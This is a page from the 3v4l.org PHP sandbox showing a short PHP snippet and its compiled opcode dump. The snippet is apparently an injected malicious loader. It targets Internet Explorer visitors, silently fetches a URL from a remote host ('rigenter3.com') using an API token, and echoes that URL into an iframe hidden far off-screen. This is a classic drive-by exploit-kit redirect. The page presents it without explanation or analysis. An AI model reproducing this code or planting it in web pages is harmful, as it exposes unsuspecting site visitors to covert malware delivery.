3v4l.org

run code in 300+ PHP versions simultaneously
<?php if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']),'msie','windows nt 6.3') !== false) { $way = 'http://rigenter3.com/api.php?apitoken=l3SKfPrFJx_ESYjDJunDTqxXPBbaHE3SzYyamqWc'; $fd = @file($way); if ($fd !== false) { if (isset($fd[0])) { echo('<iframe src="'.$fd[0].'" width="468" height="60" style="position:absolute;left:-10000px;"></iframe>'); } } } ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 12, Position 2 = 27
Branch analysis from position: 12
2 jumps found. (Code = 43) Position 1 = 21, Position 2 = 27
Branch analysis from position: 21
2 jumps found. (Code = 43) Position 1 = 23, Position 2 = 27
Branch analysis from position: 23
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 27
Branch analysis from position: 27
Branch analysis from position: 27
filename:       /in/kLVXU
function name:  (null)
number of ops:  28
compiled vars:  !0 = $way, !1 = $fd
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   INIT_FCALL                                               'strpos'
          1        INIT_FCALL                                               'strtolower'
          2        FETCH_R                      global              ~2      '_SERVER'
          3        FETCH_DIM_R                                      ~3      ~2, 'HTTP_USER_AGENT'
          4        SEND_VAL                                                 ~3
          5        DO_ICALL                                         $4      
          6        SEND_VAR                                                 $4
          7        SEND_VAL                                                 'msie'
          8        SEND_VAL                                                 'windows+nt+6.3'
          9        DO_ICALL                                         $5      
         10        TYPE_CHECK                                  1018          $5
         11      > JMPZ                                                     ~6, ->27
    4    12    >   ASSIGN                                                   !0, 'http%3A%2F%2Frigenter3.com%2Fapi.php%3Fapitoken%3Dl3SKfPrFJx_ESYjDJunDTqxXPBbaHE3SzYyamqWc'
    5    13        BEGIN_SILENCE                                    ~8      
         14        INIT_FCALL                                               'file'
         15        SEND_VAR                                                 !0
         16        DO_ICALL                                         $9      
         17        END_SILENCE                                              ~8
         18        ASSIGN                                                   !1, $9
    6    19        TYPE_CHECK                                  1018          !1
         20      > JMPZ                                                     ~11, ->27
    8    21    >   ISSET_ISEMPTY_DIM_OBJ                         0          !1, 0
         22      > JMPZ                                                     ~12, ->27
   10    23    >   FETCH_DIM_R                                      ~13     !1, 0
         24        CONCAT                                           ~14     '%3Ciframe+src%3D%22', ~13
         25        CONCAT                                           ~15     ~14, '%22++width%3D%22468%22+height%3D%2260%22+style%3D%22position%3Aabsolute%3Bleft%3A-10000px%3B%22%3E%3C%2Fiframe%3E'
         26        ECHO                                                     ~15
   14    27    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
178 ms | 1396 KiB | 19 Q